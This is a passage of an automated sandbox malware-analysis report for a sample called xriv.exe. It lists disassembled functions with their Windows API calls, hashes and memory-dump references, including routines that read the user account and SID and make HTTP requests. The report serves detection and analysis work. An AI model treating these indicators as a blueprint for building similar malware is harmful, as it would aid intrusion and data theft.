                                                                      • Instruction Fuzzy Hash: DF225771A001089FEB1CDFA8CC88BDEBBB6EF55318F54426CE515A72D5DB349A80CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 597776487-0
                                                                      • Opcode ID: ec57665b36054ec33110cc75aa23a66c4cca660d34c93e4153c0cbcc1eba3eec
                                                                      • Instruction ID: 0f46d4a7b1e9ef699fbafb58a3de4fff51e77dc59f3610cbf49b32207765ada5
                                                                      • Opcode Fuzzy Hash: ec57665b36054ec33110cc75aa23a66c4cca660d34c93e4153c0cbcc1eba3eec
                                                                      • Instruction Fuzzy Hash: 75C18671A10206AFDB2EDF7CD844BAEBBB9FF15254F54016ED7A097282E7308A41CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 011E7B12
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor
                                                                      • String ID:
                                                                      • API String ID: 2325560087-0
                                                                      • Opcode ID: f9de6ca0bbcbcacd77b2fd78ba615e45a1941eaa8a105679145292643c025ff0
                                                                      • Instruction ID: ad1d9b49da8b7708023493235607e4e159ae6f3ddd3d3c34962c6cdca16e81ee
                                                                      • Opcode Fuzzy Hash: f9de6ca0bbcbcacd77b2fd78ba615e45a1941eaa8a105679145292643c025ff0
                                                                      • Instruction Fuzzy Hash: 8551A7719006058FEF3ACFA8E88936ABBF5FB48314F148669C506E7385D3759580CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 011D3132
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 011D3147
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 011D314A
                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 011D3158
                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 011D317B
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 011D3186
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 011D3189
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 011D3199
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 011D319C
                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 011D31C6
                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 011D31D9
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 011D32D5
                                                                      • HeapFree.KERNEL32(00000000), ref: 011D32DE
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011D32E3
                                                                      • HeapFree.KERNEL32(00000000), ref: 011D32E6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011D32ED
                                                                      • HeapFree.KERNEL32(00000000), ref: 011D32F0
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D32F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                      • String ID:
                                                                      • API String ID: 3326663573-0
                                                                      • Opcode ID: 9a89cdbabbe78cd3cbf5cf1b6aa64a801aa69de9f6141f5c3b83cdf6cb7f8c7c
                                                                      • Instruction ID: 6ede966a16ab6b55daf85dde948bb30bb0d2c8d3aa6e9908964d79d190c38d24
                                                                      • Opcode Fuzzy Hash: 9a89cdbabbe78cd3cbf5cf1b6aa64a801aa69de9f6141f5c3b83cdf6cb7f8c7c
                                                                      • Instruction Fuzzy Hash: 637178B1E00209AFEB19DFE8DC88BAFBBB8FF44354F044529E915A7244DB349945CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 011F1705
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12BB
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12CD
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12DF
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12F1
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1303
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1315
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1327
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1339
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F134B
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F135D
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F136F
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1381
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1393
                                                                      • _free.LIBCMT ref: 011F16FA
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011F171C
                                                                      • _free.LIBCMT ref: 011F1731
                                                                      • _free.LIBCMT ref: 011F173C
                                                                      • _free.LIBCMT ref: 011F175E
                                                                      • _free.LIBCMT ref: 011F1771
                                                                      • _free.LIBCMT ref: 011F177F
                                                                      • _free.LIBCMT ref: 011F178A
                                                                      • _free.LIBCMT ref: 011F17C2
                                                                      • _free.LIBCMT ref: 011F17C9
                                                                      • _free.LIBCMT ref: 011F17E6
                                                                      • _free.LIBCMT ref: 011F17FE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 35f39a1b97f75b0d528ec594a6acc5da3592f602bae4d1ae00d6e2124a8dba0a
                                                                      • Instruction ID: b16040649b1ed1c93b7e449274e0c33fded6c2960487a13d29fa3f10a8d5c5b2
                                                                      • Opcode Fuzzy Hash: 35f39a1b97f75b0d528ec594a6acc5da3592f602bae4d1ae00d6e2124a8dba0a
                                                                      • Instruction Fuzzy Hash: 1F318F31604B01EFEB29AEBCE848B5677E9EF04658F50892EE25DD7160DF70E980CB14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 011E8CC2
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 011E8CE9
                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 011E8DF5
                                                                      • CatchIt.LIBVCRUNTIME ref: 011E8E4A
                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 011E8ED0
                                                                      • _UnwindNestedFrames.LIBCMT ref: 011E8F57
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 011E8F72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 4234981820-393685449
                                                                      • Opcode ID: 90b56f0689996c22637c1ef5e352c85c5b06367c84dd0e1d145bd9ee28ae2650
                                                                      • Instruction ID: 8aa3e647e2db728e42c439661edf302d885898799b17508ce2cdfb899b725c3e
                                                                      • Opcode Fuzzy Hash: 90b56f0689996c22637c1ef5e352c85c5b06367c84dd0e1d145bd9ee28ae2650
                                                                      • Instruction Fuzzy Hash: 9FC18C71800A1ADFCF1EDFE8D8889AEBBF5BF14314F04415AE9116B212D731DA51CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 011EDE42
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011EDE4E
                                                                      • _free.LIBCMT ref: 011EDE59
                                                                      • _free.LIBCMT ref: 011EDE64
                                                                      • _free.LIBCMT ref: 011EDE6F
                                                                      • _free.LIBCMT ref: 011EDE7A
                                                                      • _free.LIBCMT ref: 011EDE85
                                                                      • _free.LIBCMT ref: 011EDE90
                                                                      • _free.LIBCMT ref: 011EDE9B
                                                                      • _free.LIBCMT ref: 011EDEA9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: e8b153c898260760d4324dc36a87b933a311cf5c155505e8d7163a9db797d21e
                                                                      • Instruction ID: 8316a5139a313eaac7e9491b01d3624ace527305870e8767a689e4633bb18abf
                                                                      • Opcode Fuzzy Hash: e8b153c898260760d4324dc36a87b933a311cf5c155505e8d7163a9db797d21e
                                                                      • Instruction Fuzzy Hash: 8621B776904509AFCF09EFD4D884DDE7BF8BF18644F4085A6E6199B120DB71EA94CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InternetOpenW.WININET(01203F6C,00000000,00000000,00000000,00000000), ref: 011D871C
                                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 011D8740
                                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 011D878A
                                                                      • HttpSendRequestA.WININET(?,00000000), ref: 011D884A
                                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 011D88FC
                                                                      • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 011D89B0
                                                                      • InternetCloseHandle.WININET(?), ref: 011D89D7
                                                                      • InternetCloseHandle.WININET(?), ref: 011D89DF
                                                                      • InternetCloseHandle.WININET(?), ref: 011D89E7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                      • String ID:
                                                                      • API String ID: 1354133546-0
                                                                      • Opcode ID: 316260e1e871a04d3beae55149a8c79c9fa332999f7f27188856b41fdc48b1c5
                                                                      • Instruction ID: 834d5b7a467a02b0f979f95e86cdacc84b9e0629809edf8a7b530c937cf4ed17
                                                                      • Opcode Fuzzy Hash: 316260e1e871a04d3beae55149a8c79c9fa332999f7f27188856b41fdc48b1c5
                                                                      • Instruction Fuzzy Hash: 45C1F3B0A001189BEB2CDF28CC88BDDBF76EF45318F548198E60897291DB759AC0CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ec6adee2ed1d78d317847c39214fcea78a48c1c745d9a25c861a2faf9a111b5
                                                                      • Instruction ID: 579ec9a90e043bb28babfcf0ade3dd7aa5e5243bc690d09f28e8c327650d43d9
                                                                      • Opcode Fuzzy Hash: 9ec6adee2ed1d78d317847c39214fcea78a48c1c745d9a25c861a2faf9a111b5
                                                                      • Instruction Fuzzy Hash: 95C1EF70E0464AABDF5DCF9CD884BAEBBB2BF4A314F04415DE615AB282D7309941CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                      • String ID:
                                                                      • API String ID: 3409252457-0
                                                                      • Opcode ID: fd8620dea739311554ab2ba8bc69dcc0c6130deccc396019a5b0a154bc5ccd79
                                                                      • Instruction ID: da312fd9dced463fafc93dbe88e06a23634b275f75278cf3612f04edca11bc79
                                                                      • Opcode Fuzzy Hash: fd8620dea739311554ab2ba8bc69dcc0c6130deccc396019a5b0a154bc5ccd79
                                                                      • Instruction Fuzzy Hash: 7D510670904346AFDF2DAFA89844B6D7BE6AF09718F00419EFB0997183EB318181CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 011E85A7
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 011E85AF
                                                                      • _ValidateLocalCookies.LIBCMT ref: 011E8638
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 011E8663
                                                                      • _ValidateLocalCookies.LIBCMT ref: 011E86B8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 08b59431cbc7278c988758f8c7ec6487f4f1a70d47c460f1726baeb579fe53c6
                                                                      • Instruction ID: b4fc6b6699eee963efaa7f8669cd806d097886abae0611b37bb00a467dbc7828
                                                                      • Opcode Fuzzy Hash: 08b59431cbc7278c988758f8c7ec6487f4f1a70d47c460f1726baeb579fe53c6
                                                                      • Instruction Fuzzy Hash: AA41A474A00619EBCF18DFACC888A9EBFF5AF59318F148159E9189B391D7319A01CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 0-537541572
                                                                      • Opcode ID: fc22cd508b6d9735d209ed52f77b40b3c359aebe147df22f8b9fcc03d394c35a
                                                                      • Instruction ID: d1019ad3acd0d9c49599c387efe88415918ee4742356e084193572545ff72f0b
                                                                      • Opcode Fuzzy Hash: fc22cd508b6d9735d209ed52f77b40b3c359aebe147df22f8b9fcc03d394c35a
                                                                      • Instruction Fuzzy Hash: 5D215E72A07A23AFEB3D4EE98C4CA5A7BD49F41760F150224FD16A7280D730DD0086D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 011F1405: _free.LIBCMT ref: 011F142A
                                                                      • _free.LIBCMT ref: 011F148B
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011F1496
                                                                      • _free.LIBCMT ref: 011F14A1
                                                                      • _free.LIBCMT ref: 011F14F5
                                                                      • _free.LIBCMT ref: 011F1500
                                                                      • _free.LIBCMT ref: 011F150B
                                                                      • _free.LIBCMT ref: 011F1516
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                                      • Instruction ID: 956296d269249a092fb595cc6a942474944f8acf36114f61e3a06e66fa409cfe
                                                                      • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                                      • Instruction Fuzzy Hash: 6D116D72540B09FADA24BFF1DC09FCB77DC9F54709F814C19A3ADAA060DB28A545CA94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(?,011D5140,00000000), ref: 011F2B40
                                                                      • __fassign.LIBCMT ref: 011F2D1F
                                                                      • __fassign.LIBCMT ref: 011F2D3C
                                                                      • WriteFile.KERNEL32(?,011D5140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F2D84
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 011F2DC4
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F2E70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                      • String ID:
                                                                      • API String ID: 4031098158-0
                                                                      • Opcode ID: 3c831290dc9cf9679d9d1e72637e9e92bcab6efafea6e3ce70e26cd6aada0545
                                                                      • Instruction ID: 2a56c30beba67290fded8e76e2abf63e12e637f4e19d669b388804912ece478b
                                                                      • Opcode Fuzzy Hash: 3c831290dc9cf9679d9d1e72637e9e92bcab6efafea6e3ce70e26cd6aada0545
                                                                      • Instruction Fuzzy Hash: 29D19C71D002599FDF19CFE8D8809EDBBB5BF49314F28016EE956BB242D730AA46CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,011E8887,011E8476,011E7AC4), ref: 011E889E
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 011E88AC
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 011E88C5
                                                                      • SetLastError.KERNEL32(00000000,011E8887,011E8476,011E7AC4), ref: 011E8917
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: b8cab66a02fc75d6f027b8518e03c090370d6cfb425808343b2217ec008e8606
                                                                      • Instruction ID: 2915a0c0edc0055b56322282292cc0094d79b5233cd0305e000d795a42600270
                                                                      • Opcode Fuzzy Hash: b8cab66a02fc75d6f027b8518e03c090370d6cfb425808343b2217ec008e8606
                                                                      • Instruction Fuzzy Hash: B501D832A1EF165EAA3E55F97CCC9172BD9EF816FD7210329E620544D6FF1148004741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 011F0033
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      • API String ID: 0-2325939117
                                                                      • Opcode ID: d432c44d4bd5fb4444ab167fd387240d58d34e7d9df529ce181afcdf09e8c297
                                                                      • Instruction ID: 7323867fe7fe18c24b392430a13271d5d30bf87f14b7133b3d6c0796010cecf8
                                                                      • Opcode Fuzzy Hash: d432c44d4bd5fb4444ab167fd387240d58d34e7d9df529ce181afcdf09e8c297
